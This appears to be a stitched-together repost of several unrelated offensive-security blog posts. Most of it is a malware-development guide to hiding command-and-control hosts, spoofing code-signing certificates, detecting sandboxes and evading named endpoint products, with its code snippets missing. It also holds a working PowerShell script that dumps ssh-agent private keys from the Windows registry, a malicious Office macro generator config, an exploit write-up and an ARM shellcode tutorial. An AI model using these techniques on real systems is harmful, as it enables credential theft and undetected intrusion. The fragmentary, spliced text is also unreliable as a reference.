I hope this serves as a useful introduction to how Python opcodes might be obfuscated. There are other tools (e.g. pyREtic) out there that do the same kind of remapping process we’ve discussed here. In fact, after writing this code, I found out that this logic had already been implemented specifically for Druva inSync in the dedrop repository.

I’m sure there are more elegant approaches to opcode conversion, but the script definitely got the job done. If you’re interested in checking out the full source code, I’ve dropped it on our GitHub. Thanks for reading, and check out the Tenable TechBlog for more technical blogs and vulnerability write-ups. Give me a shout on Twitter as well!

-Chris Lyne (@lynerc)

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging ????

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment’s and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in it’s own sense too.

 

Linux Privilege Escalation via Automated Script

Картинки по запросу Linux Privilege Escalation

( Original text by Raj Chandel )

We all know that, after compromising the victim’s machine we have a low-privileges shell that we want to escalate into a higher-privileged shell and this process is known as Privilege Escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify that low-privileges shell can be escalated to higher-privileged shell. But apart from it, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinuEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot

Introduction

Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he try to gather critical information related to system such as hidden password and weak configured services or applications and etc. All these information helps the attacker to make the post exploit against machine for getting higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

There are several script use in Penetration testing for quickly identify potential privilege escalation vectors on Windows systems and today we are going to elaborate each script which is working smoothly.

LinuEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it through github with help of following command:

Once you download this script, you can simply run it by tying ./LinEnum.sh on terminal. Hence it will dump all fetched data and system details.

Let’s Analysis Its result what is brings to us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover…..

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which comes under the Post exploitation.

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that’s been taken under. Use wget to download the script from its source URL.

Now to use this script just type python linuxprivchecke.py on terminal and this will enumerate file and directory permissions/contents. This script works same as LinEnum and hunts details related to system network and user.

Let’s Analysis Its result what is brings to us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks if Root’s home folder is accessible

File having SUID/SGID Permission

For example: /bin/raj/asroot.sh which is a bash script with SUID Permission

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version, and returns a list of possible exploits.

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute following command to download it from the github:

 

To execute the script you need to run following command:

The help command will let you know all available options provide by bashark for post exploitation.

With help of portscan option you can scan the internal network of the compromised machine.

To fetch all configuration file you can use getconf option. It will pull out all configuration file stored inside /etcdirectory. Similarly you can use getprem option to view all binaries files of the target‘s machine.

BeRoot

BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. This tool does not realize any exploitation. It mains goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connection, etc.) but to print only information that have been found as potential way to escalate our privilege.

 

To execute the script you need to run following command:

It will try to enumerate all possible loopholes which can lead to privilege Escalation, as you can observe the highlighted yellow color text represents weak configuration that can lead to root privilege escalation whereas the red color represent the technique that can be used to exploit.

It’s Functions:

Check Files Permissions

SUID bin

NFS root Squashing

Docker

Sudo rules

Kernel Exploit

Conclusion: Above executed script are available on github, you can easily download it from github. These all automated script try to identify the weak configuration that can lead to root privilege escalation.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Extracting SSH Private Keys from Windows 10 ssh-agent

Intro

This weekend I installed the Windows 10 Spring Update, and was pretty excited to start playing with the new, builtin OpenSSH tools.

Using OpenSSH natively in Windows is awesome since Windows admins no longer need to use Putty and PPK formatted keys. I started poking around and reading up more on what features were supported, and was pleasantly surprised to see ssh-agent.exe is included.

I found some references to using the new Windows ssh-agent in this MSDN article, and this part immediately grabbed my attention:

Securely store private keys

I’ve had some good fun in the past with hijacking SSH-agents, so I decided to start looking to see how Windows is «securely» storing your private keys with this new service.

I’ll outline in this post my methodology and steps to figuring it out. This was a fun investigative journey and I got better at working with PowerShell.

tl;dr

Private keys are protected with DPAPI and stored in the HKCU registry hive. I released some PoC code here to extract and reconstruct the RSA private key from the registry

Using OpenSSH in Windows 10

The first thing I tested was using the OpenSSH utilities normally to generate a few key-pairs and adding them to the ssh-agent.

First, I generated some password protected test key-pairs using ssh-keygen.exe:

Powershell ssh-keygen

Then I made sure the new ssh-agent service was running, and added the private key pairs to the running agent using ssh-add:

Powershell ssh-add

Running ssh-add.exe -L shows the keys currently managed by the SSH agent.

Finally, after adding the public keys to an Ubuntu box, I verified that I could SSH in from Windows 10 without needing the decrypt my private keys (since ssh-agent is taking care of that for me):

Powershell SSH to Ubuntu

Monitoring SSH Agent

To figure out how the SSH Agent was storing and reading my private keys, I poked around a little and started by statically examining ssh-agent.exe. My static analysis skills proved very weak, however, so I gave up and just decided to dynamically trace the process and see what it was doing.

I used procmon.exe from Sysinternals and added a filter for any process name containing «ssh».

With procmon capturing events, I then SSH’d into my Ubuntu machine again. Looking through all the events, I saw ssh.exe open a TCP connection to Ubuntu, and then finally saw ssh-agent.exe kick into action and read some values from the Registry:

SSH Procmon

Two things jumped out at me:

  • The process ssh-agent.exe reads values from HKCU\Software\OpenSSH\Agent\Keys
  • After reading those values, it immediately opens dpapi.dll

Just from this, I now knew that some sort of protected data was being stored in and read from the Registry, and ssh-agent was using Microsoft’s Data Protection API

Testing Registry Values

Sure enough, looking in the Registry, I could see two entries for the keys I added using ssh-add. The key names were the fingerprint of the public key, and a few binary blobs were present:

Registry SSH Entries

Registry SSH Values

After reading StackOverflow for an hour to remind myself of PowerShell’s ugly syntax (as is tradition), I was able to pull the registry values and manipulate them. The «comment» field was just ASCII encoded text and was the name of the key I added:

Powershell Reg Comment

The (default) value was just a byte array that didn’t decode to anything meaningful. I had a hunch this was the «encrypted» private key if I could just pull it and figure out how to decrypt it. I pulled the bytes to a Powershell variable:

Powershell keybytes

Unprotecting the Key

I wasn’t very familiar with DPAPI, although I knew a lot of post exploitation tools abused it to pull out secrets and credentials, so I knew other people had probably implemented a wrapper. A little Googling found me a simple oneliner by atifaziz that was way simpler than I imagined (okay, I guess I see why people like Powershell…. 😉 )

Add-Type AssemblyName System.Security;
[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String((type raw (Join-Path $env:USERPROFILE foobar))), $null, ‘CurrentUser’))

I still had no idea whether this would work or not, but I tried to unprotect the byte array using DPAPI. I was hoping maybe a perfectly formed OpenSSH private key would just come back, so I base64 encoded the result:

Add-Type -AssemblyName System.Security  
$unprotectedbytes = [Security.Cryptography.ProtectedData]::Unprotect($keybytes, $null, 'CurrentUser')

[System.Convert]::ToBase64String($unprotectedbytes)

The Base64 returned didn’t look like a private key, but I decoded it anyway just for fun and was very pleasantly surprised to see the string «ssh-rsa» in there! I had to be on the right track.

Base 64 decoded

Figuring out Binary Format

This part actually took me the longest. I knew I had some sort of binary representation of a key, but I could not figure out the format or how to use it.

I messed around generating various RSA keys with opensslputtygen and ssh-keygen, but never got anything close to resembling the binary I had.

Finally after much Googling, I found an awesome blogpost from NetSPI about pulling out OpenSSH private keys from memory dumps of ssh-agent on Linux: https://blog.netspi.com/stealing-unencrypted-ssh-agent-keys-from-memory/

Could it be that the binary format is the same? I pulled down the Python scriptlinked from the blog and fed it the unprotected base64 blob I got from the Windows registry:

parse_mem.py

It worked! I have no idea how the original author soleblaze figured out the correct format of the binary data, but I am so thankful he did and shared. All credit due to him for the awesome Python tool and blogpost.

Putting it all together

After I had proved to myself it was possible to extract a private key from the registry, I put it all together in two scripts.

GitHub Repo

The first is a Powershell script (extract_ssh_keys.ps1) which queries the Registry for any saved keys in ssh-agent. It then uses DPAPI with the current user context to unprotect the binary and save it in Base64. Since I didn’t even know how to start parsing Binary data in Powershell, I just saved all the keys to a JSON file that I could then import in Python. The Powershell script is only a few lines:

$path = "HKCU:\Software\OpenSSH\Agent\Keys\"

$regkeys = Get-ChildItem $path | Get-ItemProperty

if ($regkeys.Length -eq 0) {  
    Write-Host "No keys in registry"
    exit
}

$keys = @()

Add-Type -AssemblyName System.Security;

$regkeys | ForEach-Object {
    $key = @{}
    $comment = [System.Text.Encoding]::ASCII.GetString($_.comment)
    Write-Host "Pulling key: " $comment
    $encdata = $_.'(default)'
    $decdata = [Security.Cryptography.ProtectedData]::Unprotect($encdata, $null, 'CurrentUser')
    $b64key = [System.Convert]::ToBase64String($decdata)
    $key[$comment] = $b64key
    $keys += $key
}

ConvertTo-Json -InputObject $keys | Out-File -FilePath './extracted_keyblobs.json' -Encoding ascii  
Write-Host "extracted_keyblobs.json written. Use Python script to reconstruct private keys: python extractPrivateKeys.py extracted_keyblobs.json"  

I heavily borrowed the code from parse_mem_python.py by soleblaze and updated it to use Python3 for the next script: extractPrivateKeys.py. Feeding the JSON generated from the Powershell script will output all the RSA private keys found:

Extracting private keys

These RSA private keys are unencrypted. Even though when I created them I added a password, they are stored unencrypted with ssh-agent so I don’t need the password anymore.

To verify, I copied the key back to a Kali linux box and verified the fingerprint and used it to SSH in!

Using the key

Next Steps

Obviously my PowerShell-fu is weak and the code I’m releasing is more for PoC. It’s probably possible to re-create the private keys entirely in PowerShell. I’m also not taking credit for the Python code — that should all go to soleblaze for his original implementation.

Malicious Macro Generator Utility

Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.

Malicious Macro Generator Utility
Malicious Macro Generator Utility

Requirement

Python 2.7

Usage

MMG.Malicious Macro Generator v2.0 - RingZer0 Team
Author: Mr.Un1k0d3r

Usage: MMG.py [config] [output] (optional -list)

        config  Config file that contain generator information
        output  Output filename for the macro
        -list   List all available payloads and evasion techniques

python MMG.py configs/generic-cmd.json malicious.vba

Config file

Example of a project config file.

{
	"description": "Generic command exec payload\nEvasion technique set to domain check",
	"template": "templates/payloads/generic-cmd-evasion-template.vba",
	"varcount": 150,
	"encodingoffset": 4,
	"chunksize": 200,
	"encodedvars": 	{
				"DOMAIN":"RINGZER0"
			},
	"vars": 	[],
	"evasion": 	["encoder", "domain"],
	"payload": "cmd.exe /c whoami"
}

Evasion techniques

Domain check

The macro is fetching the USERDOMAIN environment variable and compare the value with a predefined one. If they match the final payload is executed.

Disk check

The macro is looking for the total disk space. VMs and test machines use small disk most of the time.

Memory check

The macro is looking for the total memory size. Vms and test machines use less resources.

Uptime check

The macro is looking for the system uptime. Sandboxes will return a short uptime.

Process check

The macro is checking if a specific process is running (example outlook.exe)

Obfuscation

The python script will also generate obfuscated code to avoid heuristic detection

 

AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently along-side your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years, I update my AMD drivers and notice plays_service.exe” has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boiler plate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is python based and has been packaged with something like py2exe. While decompiling python byte code is rather trivial, the trick with these types of executables is identifying and locating the python classes. Python byte-code in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of python. The first string I track down is “Unable to create Python obj for executable name!” . At first glance it appears to be an error message if certain python objects aren’t created properly. Scrolling up in the function it references, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success, only one zip file exists and it is named python35.zip! It’s filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled bytecode python files which I presume to be the applications core source code and library dependencies.

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephermal port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter which holds the command to be processed. The second is a hash value of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command function, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.

The function logic is pretty straight forward. It performs a couple insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail of note is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

WRITING ARM SHELLCODE

INTRODUCTION TO WRITING ARM SHELLCODE

 

This tutorial is for people who think beyond running automated shellcode generators and want to learn how to write shellcode in ARM assembly themselves. After all, knowing how it works under the hood and having full control over the result is much more fun than simply running a tool, isn’t it? Writing your own shellcode in assembly is a skill that can turn out to be very useful in scenarios where you need to bypass shellcode-detection algorithms or other restrictions where automated tools could turn out to be insufficient. The good news is, it’s a skill that can be learned quite easily once you are familiar with the process.

For this tutorial we will use the following tools (most of them should be installed by default on your Linux distribution):

  • GDB – our debugger of choice
  • GEF –  GDB Enhanced Features, highly recommended (created by @_hugsy_)
  • GCC – Gnu Compiler Collection
  • as – assembler
  • ld – linker
  • strace – utility to trace system calls
  • objdump – to check for null-bytes in the disassembly
  • objcopy – to extract raw shellcode from ELF binary

Make sure you compile and run all the examples in this tutorial in an ARM environment.

Before you start writing your shellcode, make sure you are aware of some basic principles, such as:

  1. You want your shellcode to be compact and free of null-bytes
    • Reason: We are writing shellcode that we will use to exploit memory corruption vulnerabilities like buffer overflows. Some buffer overflows occur because of the use of the C function ‘strcpy’. Its job is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work.
  2. You also want to avoid library calls and absolute memory addresses
    • Reason: To make our shellcode as universal as possible, we can’t rely on library calls that require specific dependencies and absolute memory addresses that depend on specific environments.

The Process of writing shellcode involves the following steps:

  1. Knowing what system calls you want to use
  2. Figuring out the syscall number and the parameters your chosen syscall function requires
  3. De-Nullifying your shellcode
  4. Converting your shellcode into a Hex string
UNDERSTANDING SYSTEM FUNCTIONS

Before diving into our first shellcode, let’s write a simple ARM assembly program that outputs a string. The first step is to look up the system call we want to use, which in this case is “write”. The prototype of this system call can be looked up in the Linux man pages:

ssize_t write(int fd, const void *buf, size_t count);

From the perspective of a high level programming language like C, the invocation of this system call would look like the following:

const char string[13] = "Azeria Labs\n";
write(1, string, sizeof(string));        // Here sizeof(string) is 13

Looking at this prototype, we can see that we need the following parameters:

  • fd – 1 for STDOUT
  • buf – pointer to a string
  • count – number of bytes to write -> 13
  • syscall number of write -> 0x4

For the first 3 parameters we can use R0, R1, and R2. For the syscall we need to use R7 and move the number 0x4 into it.

mov   r0, #1      @ fd 1 = STDOUT
ldr   r1, string  @ loading the string from memory to R1
mov   r2, #13     @ write 13 bytes to STDOUT 
mov   r7, #4      @ Syscall 0x4 = write()
svc   #0

Using the snippet above, a functional ARM assembly program would look like the following:

.data
string: .asciz "Azeria Labs\n"  @ .asciz adds a null-byte to the end of the string
after_string:
.set size_of_string, after_string - string

.text
.global _start

_start:
   mov r0, #1               @ STDOUT
   ldr r1, addr_of_string   @ memory address of string
   mov r2, #size_of_string  @ size of string
   mov r7, #4               @ write syscall
   swi #0                   @ invoke syscall

_exit:
   mov r7, #1               @ exit syscall
   swi 0                    @ invoke syscall

addr_of_string: .word string

In the data section we calculate the size of our string by subtracting the address at the beginning of the string from the address after the string. This, of course, is not necessary if we would just calculate the string size manually and put the result directly into R2. To exit our program we use the system call exit() which has the syscall number 1.

Compile and execute:

azeria@labs:~$ as write.s -o write.o && ld write.o -o write
azeria@labs:~$ ./write
Azeria Labs

Cool. Now that we know the process, let’s look into it in more detail and write our first simple shellcode in ARM assembly.

1. TRACING SYSTEM CALLS

For our first example we will take the following simple function and transform it into ARM assembly:

#include <stdio.h>

void main(void)
{
    system("/bin/sh");
}

The first step is to figure out what system calls this function invokes and what parameters are required by the system call. With ‘strace’ we can monitor our program’s system calls to the Kernel of the OS.

Save the code above in a file and compile it before running the strace command on it.

azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
-f -- follow forks, -ff -- with output into separate files
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
--- snip --
azeria@labs:~$ strace -f -v system
--- snip --
[pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi", "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1", "OLDPWD=/home/azeria", "HOME=/home/azeria", "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1", "LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm", "PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8", "LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash", "EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8", "PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) = 0
--- snip --
[pid 4575] write(2, "$ ", 2$ ) = 2
[pid 4575] read(0, exit
--- snip --
exit_group(0) = ?
+++ exited with 0 +++

Turns out, the system function execve() is being invoked.

2. SYSCALL NUMBER AND PARAMETERS

The next step is to figure out the syscall number of execve() and the parameters this function requires. You can get a nice overview of system calls at w3calls or by searching through Linux man pages. Here’s what we get from the man page of execve():

NAME
    execve - execute program
SYNOPSIS

    #include <unistd.h>

    int  execve(const char *filename, char *const argv [], char *const envp[]);

The parameters execve() requires are:

  • Pointer to a string specifying the path to a binary
  • argv[] – array of command line variables
  • envp[] – array of environment variables

Which basically translates to: execve(*filename, *argv[], *envp[]) –> execve(*filename, 0, 0). The system call number of this function can be looked up with the following command:

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h 
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

